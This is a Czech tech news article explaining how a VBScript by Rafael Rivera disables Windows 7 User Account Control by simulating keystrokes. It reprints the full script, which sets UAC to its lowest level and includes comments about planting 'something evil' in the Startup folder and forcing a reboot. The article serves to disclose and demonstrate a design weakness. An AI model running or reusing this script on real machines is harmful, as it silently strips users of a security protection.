Vtip spočívá v tom, že to není chyba, ale vlastnost. Pokud vám něco říká jméno Rafael Rivera, asi už budete vědět, že pro něj v podstatě nic není nemožné a obelstít UAC ve Windows 7 je dokonce až neuvěřitelně snadné. Pokud vám to jméno nic neříká, v rychlosti si připomeňme, že stojí za známým skriptem do pluginu GreaseMonkey, který umožňoval obcházet kontrolu pravosti Windows při stahování z Microsoft Download Centra (dnes to již nefunguje, Microsoft jednak metodu značně zabezpečil a navíc byl Rafael donucen odstavit server, který validní kódy na internetu ukazoval a na jehož bázi si je skript stahoval), nebo jej možná budete znát coby autora upravených uxtheme knihoven, díky čemuž není potřeba mít pro aplikaci vlastního téma do systému Windows toto téma digitálně podepsané. Dnes to bude o jednoduchém VB Scriptu, který simuluje stisk kláves, čímž systém Windows efektivně přesvědčí o tom, že úpravu nastavení dělá uživatel. A právě výchozí nastavení UAC je takové, že systém hlásí změny dělané programem, ale nehlásí změny dělané uživatelem (tak to prostě Microsoft zamýšlel udělat, proto to není chyba, ale vlastnost). Mezi tyto změny, které může uživatel provést, je ovšem také vypnutí celého slavného UAC.

My jsme si Rafaelův skript vyzkoušeli na naší testovací instalaci Windows 7 a připravili jsme pro vás názorné video. Na začátku uvidíte myší ovládaný systém, kde vám ukážeme výchozí nastavení UAC. Pak se letmo podíváme do skriptu (v té době ještě s příponou TXT, takže se otevírá jako text, nespouští se), následně mu změníme příponu, aby se z něj stal spustitelný skript a ten spustíme. Změnu v nastavení UAC samozřejmě uvidíte, skript má dostatečné časové prodlevy. V podstatě nedělá nic jiného, než že stiskne Ctrl+Esc, do vyhledávání napíše change uac a pak dá dvakrát šipku dolů, Enter, Tab, třikrát dolů, Tab a Enter. Po skončení práce skriptu se znovu ručně podíváme na nastavení, kde uvidíte UAC vypnuté.

Kdyby vás zajímalo, jak je ten kód celkem jednoduchý, tady je:

'// 1337H4x Written by _____________ 
'//                    (12 year old)

Set WshShell = WScript.CreateObject("WScript.Shell")

'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)

'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)

'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)

'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")

'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")

'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder

'// Reboot the system
'// WshShell.Run "shutdown /r /f"